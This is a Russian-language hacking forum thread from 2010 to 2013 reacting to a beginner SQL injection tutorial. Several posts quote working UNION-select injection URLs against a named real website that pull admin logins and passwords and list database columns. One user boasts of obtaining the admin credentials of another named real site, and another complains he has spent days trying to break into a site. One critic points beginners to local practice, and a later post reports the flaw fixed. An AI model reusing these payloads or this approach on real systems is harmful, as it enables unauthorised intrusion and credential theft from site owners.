 |
|
20.12.2010, 00:45
|
|
Новичок
Регистрация: 03.06.2010
Сообщений: 21
С нами:
8389843
Репутация:
0
|
|
а вообще статья хорошая для нубов как я
Я пошол в топик ачата где просто дают ссылки на сайты с SQL инъкциями
и почитав эту статью нашол пароль и логин от админки сайта
http://www.dovidkalutsk.com.ua/
|
|
|
20.12.2010, 05:26
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
С нами:
8395840
Репутация:
5
|
|
Сообщение от rudi
Народ
я ввел из урока последнюю строку
http://www.td-vezdehod.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,group_concat(login ,0x3a,passw),20,21,22+from+AdminSite+--+
но не увидел ни логина ни пароля
Пробелы лишние сотри, которые форум вставляет)
|
|
|
|
20.12.2010, 22:29
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами:
8456812
Репутация:
55
|
|
Сообщение от Boa
Я сам не так давно начал практиковать SQL-инъекции
Ну и нахера тогда писате статью,итак полно инфы,кто захочет,тот научиться,кто не захочет/не сможет значит не судьба,помню фразу чью-то давно "Неправильно заученный материал еще хуже незнания" мб как-то по другому,но смысл был таков.
Сообщение от Boa
Что такое SQL Injection? Это внедрение злоумышленником постороннего SQL-кода при помощи составлении специального URL (адреса, для танкистов)
Слова POST или cookie вам что-нибудь говорит?Боюсь,что нет
Сообщение от Boa
Пока особо в это не вдумывайтесь, это теория, потом поймете
Вахаха,"можете вообще не думать,читая ету статью."
Сообщение от Boa
Делаем вот так:
Код:
http://www.td-vezdehod.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat(column_name),20,21,22+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=AdminSite+--+
доо
Сообщение от Boa
Имхо, SQL инъекции идеальны для начинающего хацкера
О да,а квантовая физика идеальна для первоклассников,инфа 100%
Сообщение от Boa
Статья написана исключительно в целях помочь всевозможным администраторам уберечься от SQL-инъекций. За использование полученных из статьи сведений автор отвественности не несет!
Да ты что,в статье про это так много сказано,администраторы прям навалили кучу от счастья.
Вообщем статью стоило назвать "Что надо делать когда у вас есть стандартная скуля на 5 ветке mysql" - и то,целью стояло (ну я так понял) построить грамотную и понятную обсолютно любому статью,тут же ты просто введешь людей в заблуждение.
А еще,вот допустим новичок нарвался на mssql или oracle чтоже он будет делать?Или фильруется что-то,где обходы,ах боюсь предположить,что ты сам нехера не в теме.
Всем новичкам,кто очень хочет научиться и вникнуть в тему советую сделать следующее:
1.)Ни в коем случае не читать етот бред (это лишь совет,выбирать вам)
2.)Идти читать документации (ну или хотябы книжку какую-нибудь,где самые основы и нетолько)
3.)Идти читать статью от нуля (она неподалеку и прикреплена,если будет непонятно,то значит плохо прочитали документацию,либо не судьба)
4.)Ну и конечно же практиковаться,сначала на локалке,скачать денвер (ненадо изобретать велосипед) и поставить уязвимый скрипт,смотреть что да как.
Ну или прочитать енто и идти хекать тырнеты,незная что такое update\drop и так далее=\
P.S. Автор,не обижайся на меня,я лишь высказал свое мнение,надеюсь,что ты когда-нибудь скажешь сам c улыбкой "О боже,как я мог такое написать "
|
|
|
|
21.12.2010, 15:17
|
|
Познающий
Регистрация: 29.11.2010
Сообщений: 49
С нами:
8132726
Репутация:
0
|
|
А у меня все получается до того когда тейблы выводятся и все. Конвертировал все в аси а при запросе выводит раз двадцать название тейбла.(user,user,user,user)
|
|
|
|
26.12.2010, 01:44
|
|
Участник форума
Регистрация: 26.11.2010
Сообщений: 226
С нами:
8137046
Репутация:
0
|
|
ТС, а чем тебя /thread43966.html не устраивает?
ЗЫ Вот она для новичков, а ты для скрипт кидисов написал
|
|
|
|
27.12.2010, 16:46
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
С нами:
8395840
Репутация:
5
|
|
Сообщение от HBWS
ТС, а чем тебя /thread43966.html не устраивает?
ЗЫ Вот она для новичков, а ты для скрипт кидисов написал
|
|
|
|
27.12.2010, 17:25
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами:
9157119
Репутация:
74
|
|
Сообщение от rudi
Народ
я ввел из урока последнюю строку
http://www.td-vezdehod.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,group_concat(login ,0x3a,passw),20,21,22+from+AdminSite+--+
но не увидел ни логина ни пароля
Уязвимость на том сайте была отфиксена еще когда я впервые прочел эту статью.
|
|
|
|
27.12.2010, 17:37
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
С нами:
8395840
Репутация:
5
|
|
Хм, действительно пофиксили.
|
|
|
|
18.08.2013, 19:11
|
|
Новичок
Регистрация: 14.08.2013
Сообщений: 2
С нами:
6708566
Репутация:
0
|
|
Блин...думал тут решится мой вопрос))
ребят вы чего друг у друга копипастите?))
это обычный копипаст просто своими словами.....
вот я не могу сделать все по инструкции... т .к у меня вылазит вот такая ошибочка,даже не ошибочка а просто вылазит вот такая штука :
1)Вот ссылка до изменения http://site.ru/index.php?f=stat&sid=2
2)вот ссылка в именении http://site.ru/index.php?f=stat&sid=2FROM news WHERE id='774'
3)Вот ссылка после изменения : http://site.ru/index.php?f=stat&sid=2FROM%20news%20WHERE%20id='77 4'
__________________________________________________ ___
Вот и обьсни мне пожалуйста,откуда тут взялись %20 ?? я уже 5-тые сутки не могу взломать этот сайт ;D
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
